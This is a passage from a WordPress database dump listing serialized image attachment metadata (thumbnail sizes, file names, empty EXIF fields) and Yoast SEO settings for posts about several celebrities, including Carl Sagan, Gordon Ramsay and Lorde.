g\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-654x385.jpg\";s:5:\"width\";i:654;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-654x486.jpg\";s:5:\"width\";i:654;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-654x580.jpg\";s:5:\"width\";i:654;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-305x420.jpg\";s:5:\"width\";i:305;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3712,534,'_thumbnail_id','635'),(3714,534,'_yoast_wpseo_primary_category',''),(3715,636,'_wp_attached_file','2015/11/tracy_morgan.jpg'),(3716,636,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2015/11/tracy_morgan.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"tracy_morgan-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"tracy_morgan-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-400x261.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-400x462.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-400x385.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-400x486.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-400x580.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"tracy_morgan-280x420.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3717,533,'_yoast_wpseo_focuskw_text_input','Tracy Morgan'),(3718,533,'_yoast_wpseo_content_score','90'),(3719,533,'_thumbnail_id','636'),(3721,533,'_yoast_wpseo_primary_category',''),(3722,638,'_wp_attached_file','2015/11/CarlSagan.jpg'),(3723,638,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:404;s:4:\"file\";s:21:\"2015/11/CarlSagan.jpg\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"CarlSagan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"CarlSagan-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:19:\"CarlSagan-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:20:\"CarlSagan-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:21:\"CarlSagan-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:21:\"CarlSagan-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:21:\"CarlSagan-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:21:\"CarlSagan-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:21:\"CarlSagan-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:21:\"CarlSagan-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:21:\"CarlSagan-300x364.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:21:\"CarlSagan-300x261.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:21:\"CarlSagan-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3724,532,'_yoast_wpseo_focuskw_text_input','Carl Sagan'),(3725,532,'_yoast_wpseo_content_score','60'),(3726,532,'_thumbnail_id','641'),(3728,532,'_yoast_wpseo_primary_category',''),(3729,640,'_wp_attached_file','2016/11/carlsagan.jpg'),(3730,640,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:425;s:4:\"file\";s:21:\"2016/11/carlsagan.jpg\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"carlsagan-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"carlsagan-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:19:\"carlsagan-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:20:\"carlsagan-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:21:\"carlsagan-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:21:\"carlsagan-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:21:\"carlsagan-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:21:\"carlsagan-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:21:\"carlsagan-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:21:\"carlsagan-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:21:\"carlsagan-300x364.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:21:\"carlsagan-300x261.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:21:\"carlsagan-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:21:\"carlsagan-296x420.jpg\";s:5:\"width\";i:296;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3731,641,'_wp_attached_file','2016/11/carlsagan-1.jpg'),(3732,641,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:360;s:4:\"file\";s:23:\"2016/11/carlsagan-1.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:21:\"carlsagan-1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:22:\"carlsagan-1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-324x360.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-356x360.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:23:\"carlsagan-1-480x261.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3735,642,'_wp_attached_file','2015/11/GordonRamsay1.jpg'),(3736,642,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:615;s:6:\"height\";i:620;s:4:\"file\";s:25:\"2015/11/GordonRamsay1.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"GordonRamsay1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"GordonRamsay1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-615x385.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-615x486.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-615x580.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"GordonRamsay1-417x420.jpg\";s:5:\"width\";i:417;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3737,531,'_thumbnail_id','642'),(3738,531,'_yoast_wpseo_primary_category',''),(3739,531,'_yoast_wpseo_focuskw_text_input','Gordon Ramsay'),(3740,531,'_yoast_wpseo_content_score','90'),(3742,644,'_wp_attached_file','2015/11/lorde.jpg'),(3743,644,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:529;s:6:\"height\";i:529;s:4:\"file\";s:17:\"2015/11/lorde.jpg\";s:5:\"sizes\";a:16:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"lorde-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"lorde-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:15:\"lorde-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:16:\"lorde-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:17:\"lorde-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:17:\"lorde-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:17:\"lorde-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:17:\"lorde-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:17:\"lorde-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:17:\"lorde-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:17:\"lorde-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:17:\"lorde-529x261.jpg\";s:5:\"width\";i:529;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:17:\"lorde-529x462.jpg\";s:5:\"width\";i:529;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:17:\"lorde-529x385.jpg\";s:5:\"width\";i:529;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:17:\"lorde-529x486.jpg\";s:5:\"width\";i:529;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:17:\"lorde-420x420.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3744,530,'_yoast_wpseo_focuskw_text_input','Lorde'),(3745,530,'_yoast_wpseo_content_score','90'),(3746,530,'_thumbnail_id','644'),(3748,530,'_yoast_wpseo_primary_category',''),(3749,646,'_wp_attached_file','2015/11/LamarOdom.jpg'),(3750,646,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2071;s:6:\"height\";i:2589;s:4:\"file\";s:21:\"2015/11/LamarOdom.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"LamarOdom-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"LamarOdom-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"LamarOdom-768x960.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"LamarOdom-819x1024.jpg\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:19:\"LamarOdom-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:20:\"LamarOdom-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:21:\"LamarOdom-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:21:\"LamarOdom-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:21:\"LamarOdom-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:21:\"LamarOdom-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:21:\"LamarOdom-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:21:\"LamarOdom-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:21:\"LamarOdom-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:21:\"LamarOdom-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:21:\"LamarOdom-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:21:\"LamarOdom-696x870.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:870;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:21:\"LamarOdom-696x385.jpg\"